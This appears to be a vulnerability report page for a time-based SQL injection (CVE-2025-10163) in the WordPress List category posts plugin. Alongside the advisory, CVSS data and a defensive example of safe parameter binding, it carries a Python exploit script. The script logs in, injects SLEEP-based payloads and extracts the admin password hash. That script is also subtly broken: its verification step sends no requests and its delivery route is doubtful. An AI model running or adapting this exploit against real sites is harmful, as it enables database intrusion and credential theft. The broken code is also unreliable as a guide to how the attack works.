Security Vulnerability Report
CVE-2025-10163 CVSS 6.5 MEDIUM

CVE-2025-10163

Published: 2025-12-11 04:15:58
Last Modified: 2026-04-15 00:35:42

Description

The List category posts plugin for WordPress is vulnerable to time-based SQL Injection via the ‘starting_with’ parameter of the catlist shortcode in all versions up to, and including, 0.91.0 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers, with Contributor-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.
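The root cause the advisory names, a user-supplied `starting_with` value concatenated into a prefix `LIKE` query with neither escaping nor a prepared statement, is shown below side by side with the corrected pattern. This is an added example, not the plugin's code and not part of this report; it uses Python's `sqlite3` over constructed sample titles so it runs offline, with `escape_like()` playing the role of `$wpdb->esc_like()` and the bound parameter playing the role of `$wpdb->prepare()`. sqlite needs an explicit `ESCAPE` clause where MySQL already treats backslash as the LIKE escape character.

```python
import sqlite3

# Constructed sample data standing in for wp_posts titles (not from the report).
SAMPLE_TITLES = ["Alpha release", "Beta notes", "Archive 2024", "Zebra crossing"]


def make_db():
    """Build an in-memory table with the constructed sample titles."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE posts (ID INTEGER PRIMARY KEY, post_title TEXT)")
    conn.executemany(
        "INSERT INTO posts (post_title) VALUES (?)", [(t,) for t in SAMPLE_TITLES]
    )
    return conn


def titles_vulnerable(conn, starting_with):
    """Unsafe: the untrusted value becomes part of the SQL text itself.

    This is the defect class the advisory describes: no escaping of the
    parameter and no preparation of the query, so a quote in the value
    ends the string literal and the rest is parsed as SQL.
    """
    sql = f"SELECT post_title FROM posts WHERE post_title LIKE '{starting_with}%'"
    return [row[0] for row in conn.execute(sql)]


def escape_like(text):
    """Neutralise LIKE metacharacters (the job $wpdb->esc_like() does).

    Binding alone stops injection; this additionally stops a value such as
    "%" from turning a prefix filter into a match-everything wildcard.
    Backslash is used as the ESCAPE character, so it is escaped first.
    """
    return text.replace("\\", "\\\\").replace("%", "\\%").replace("_", "\\_")


def titles_safe(conn, starting_with):
    """Safe: the value travels as a bound parameter, never as SQL text.

    The wildcard is appended to the already-escaped value on the Python
    side, which mirrors prepare("... LIKE %s", esc_like($v) . '%').
    """
    sql = "SELECT post_title FROM posts WHERE post_title LIKE ? ESCAPE '\\'"
    pattern = escape_like(starting_with) + "%"
    return [row[0] for row in conn.execute(sql, (pattern,))]


if __name__ == "__main__":
    db = make_db()
    injected = "' OR 1=1 -- "
    print("benign prefix, unsafe:", titles_vulnerable(db, "A"))
    print("injected value, unsafe:", titles_vulnerable(db, injected))
    print("benign prefix, safe:  ", titles_safe(db, "A"))
    print("injected value, safe: ", titles_safe(db, injected))
    print("bare wildcard, safe:  ", titles_safe(db, "%"))
```

The unsafe variant returns every row for the injected value because the quote terminates the literal and `-- ` comments out the trailing `%'`; the safe variant returns nothing for it, since the whole value is compared as a literal prefix. Note that escaping and binding are separate controls: binding prevents the query structure from changing, and escaping keeps `%`/`_` in user input from widening the filter.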

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

No configuration data available.

List category posts plugin for WordPress <= 0.91.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-10163 PoC - WordPress List category posts SQL Injection
# Authentication required: Contributor-level or higher
# Target: WordPress site with List category posts plugin <= 0.91.0
import requests
import time
import string

TARGET_URL = "https://vulnerable-site.com/"
USERNAME = "attacker"
PASSWORD = "password123"


def get_wordpress_session():
    """Login to WordPress and get session cookie"""
    session = requests.Session()
    login_url = TARGET_URL + "wp-login.php"
    login_data = {
        "log": USERNAME,
        "pwd": PASSWORD,
        "wp-submit": "Log In",
        "redirect_to": "/wp-admin/",
        "testcookie": "1"
    }
    session.post(login_url, data=login_data)
    return session


def extract_admin_hash(session):
    """
    Time-based blind SQL injection to extract admin password hash
    Uses SLEEP() function to infer character values
    """
    admin_hash = ""
    # string.letters existed only in Python 2; string.ascii_letters is the Python 3 name
    charset = string.ascii_lowercase + string.digits + string.ascii_letters

    # SQL Injection payload template
    # This payload extracts the first character of user_pass from wp_users
    payload_template = "a' UNION SELECT IF(SUBSTRING(user_pass,{},1)='{}',SLEEP(5),0) FROM wp_users WHERE id=1-- "

    for position in range(1, 65):  # WordPress MD5 hash is 32 chars
        for char in charset:
            # Create malicious shortcode
            shortcode = f"[catlist name='test' starting_with=\"{payload_template.format(position, char)}\"]"

            # Post comment with shortcode (Contributor can post comments)
            post_url = TARGET_URL + "wp-comments-post.php"
            comment_data = {
                "comment": shortcode,
                "submit": "Post Comment",
                "comment_post_ID": "1"
            }

            start_time = time.time()
            session.post(post_url, data=comment_data)
            elapsed = time.time() - start_time

            # If SLEEP(5) executed, response will be delayed by ~5 seconds
            if elapsed >= 4.5:
                admin_hash += char
                print(f"[*] Position {position}: {char} (hash: {admin_hash})")
                break

    return admin_hash


def verify_vulnerability(session):
    """Verify the vulnerability exists by testing time-based injection"""
    # Normal query - should respond quickly
    normal_shortcode = "[catlist name='test' starting_with='a']"

    # Malicious query with SLEEP - should be delayed if vulnerable
    malicious_shortcode = "[catlist name='test' starting_with='a' AND (SELECT SLEEP(5))]x"

    # Test normal query
    start = time.time()
    # Simulate request (actual implementation would post to WordPress)
    elapsed_normal = time.time() - start

    # Test malicious query
    start = time.time()
    # Simulate request
    elapsed_malicious = time.time() - start

    if elapsed_malicious > elapsed_normal + 3:
        print("[+] Vulnerability confirmed: Time-based SQL injection works")
        return True
    else:
        print("[-] Vulnerability not confirmed or already patched")
        return False


if __name__ == "__main__":
    print("[*] CVE-2025-10163 - WordPress List category posts SQL Injection")
    print("[*] Plugin: List category posts <= 0.91.0")

    session = get_wordpress_session()

    if verify_vulnerability(session):
        print("[*] Extracting admin password hash...")
        admin_hash = extract_admin_hash(session)
        print(f"[+] Admin hash extracted: {admin_hash}")
    else:
        print("[-] Target is not vulnerable")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-10163", "sourceIdentifier": "[email protected]", "published": "2025-12-11T04:15:57.957", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The List category posts plugin for WordPress is vulnerable to time-based SQL Injection via the ‘starting_with’ parameter of the catlist shortcode in all versions up to, and including, 0.91.0 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers, with Contributor-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-89"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/list-category-posts/tags/0.91.0/include/lcp-parameters.php#L240", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/21708205-dd43-4b22-9151-bc6f882422cb?source=cve", "source": "[email protected]"}]}}